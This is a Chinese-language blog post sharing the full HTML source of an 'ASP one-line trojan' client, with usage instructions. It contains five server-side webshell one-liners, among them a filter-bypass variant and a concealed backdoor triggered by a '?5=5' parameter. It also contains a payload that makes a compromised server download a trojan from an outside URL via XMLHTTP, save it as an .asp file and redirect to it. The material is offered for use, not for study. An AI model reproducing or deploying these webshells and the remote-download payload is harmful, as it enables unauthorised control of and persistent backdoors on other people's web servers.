asp一句话木马客户端下载和使用教程

4年前写过的一个小小的asp木马利用程序。
可以调用XMLHTTP控件让服务器从网上下载ASP木马并保存在服务器上!
可以突破服务器的关键词过滤而导制的我们的大马无法正常提交的障碍!
asp一句话木客户端代码如下：

1. <HTML><HEAD><TITLE>ＡＳＰ一句话客户端</TITLE>
   
2. <META http-equiv=Content-Type content="text/html; charset=gb2312">
   
3. <STYLE type=text/css><!--
   
4. body {
   
5.     background-color: #000000;
   
6.     font-size: 12px;
   
7. }
   
8. .bad {
   
9.     border: 1px solid #33ff00;
   
10.     font-size: 12px;
    
11.     link{COLOR:#33ff00;};A:visited{COLOR:#33ff00;};
    
12. }
    
13. -->
    
14. </STYLE>
    
15. 
    
16. <META content="MSHTML 6.00.2900.3132" name=GENERATOR></HEAD>
    
17. <BODY>
    
18. <CENTER>
    
19. <DIV
    
20. style="FONT-SIZE: 16pt; FILTER: glow(color=#33ff00, strength=6); WIDTH: 350px; COLOR: #33ff00; LINE-HEIGHT: 35pt; FONT-FAMILY: Comic Sans MS; POSITION: relative"><br>ＡＳＰ一句话客户端远程上传版</DIV>
    
21. <TABLE class=bad height=14 cellSpacing=0 width=627 align=center border=1 boodercolor=#33ff00>
    
22.   <TBODY>
    
23.   <TR>
    
24.     <TD width=794 height=1>
    
25.       <FORM name=pass method=post><FONT color=#33ff00>服务端网址:</FONT><INPUT id=act
    
26.       size=76 value=http:// name=act> <INPUT onclick=this.form.blfy.name=this.form.password.value;this.form.action=this.form.act.value; type=submit value=GOGOGO>
    
27.       <BR><FONT color=#33ff00>登陆密码:  </font><INPUT id=password size=76 value=blfy name=password> <INPUT id=blfy
    
28.       type=hidden
    
29.       value='Execute("Session(""blfy"")=request(""*""):Execute(Session(""blfy""))")'
    
30.       name=blfy> </TD></TR>
    
31.   <TR>
    
32.     <TD width=794 height=100><TEXTAREA name=* rows=5 cols=100 width="45">Set xPost = CreateObject("Microsoft.XMLHTTP")
    
33.          xPost.Open "GET","http://www.jbl86.com/news.txt",False
    
34.          xPost.Send()
    
35.          Set sGet = CreateObject("ADODB.Stream")
    
36.          sGet.Mode = 3
    
37.          sGet.Type = 1
    
38.          sGet.Open()
    
39.          sGet.Write(xPost.responseBody)
    
40.          sGet.SaveToFile Server.MapPath("kenn.asp"),2
    
41.          set sGet = nothing
    
42.          set sPOST = nothing
    
43.          response.redirect "kenn.asp"</TEXTAREA> </TD></TR>
    
44.   <TR>
    
45.     <TD width=794 height=7><font color=#33ff00>把红色的<FONT color=red> blfy </FONT>换成您的密码!    提供五个服务端: <BR>1.
    
46.       <%eval request("<FONT color=red>blfy</FONT>")%> <BR>2. <%execute
    
47.       request("<FONT color=red>blfy</FONT>")%> <BR>3.
    
48.       <%execute(request("<FONT color=red>blfy</FONT>"))%> <BR>
    
49.       4、<script language=VBScript runat=server>execute request("<FONT color=red>blfy</FONT>")</Script>  突破<%%>过滤版<br>
    
50.       5、<%If request("5") ="5" then eval request("<FONT color=red>blfy</FONT>") end if %>  隐蔽后门版,访问格式为: help.asp?5=5<br></font>
    
51. </TD></TR></TBODY></TABLE>
    
52. </FORM></CENTER><font color="#33ff00">
    
53. <center>
    
54. 本程序可以调用XMLHTTP控件让服务器从网上下载ASP木马并保存在服务器上!<br>
    
55. 可以突破服务器的关键词过滤而导制的我们的大马无法正常提交的障碍! <br><br>
    
56. 使用方法: 先把自己的ASP大马上传的自己的空间里.只能是TXT格式.<br>
    
57. 再把 http://www.jbl86.com/news.txt 改成你的网马地址.如 http://www.921506.cn/muma.txt    <br>   
    
58. 再把两个 kenn.asp 都改成你要保存的木马的文件名.如: muma.asp 默认地址可以不改: kenn.asp<br><br>
    
59. 程序设计： Kenn    QQ:921506    Blog: <a href=http://www.cnblogs.com/kenn0626>myBlog</a></center></font></BODY></HTML>

复制代码

客户端界面截图：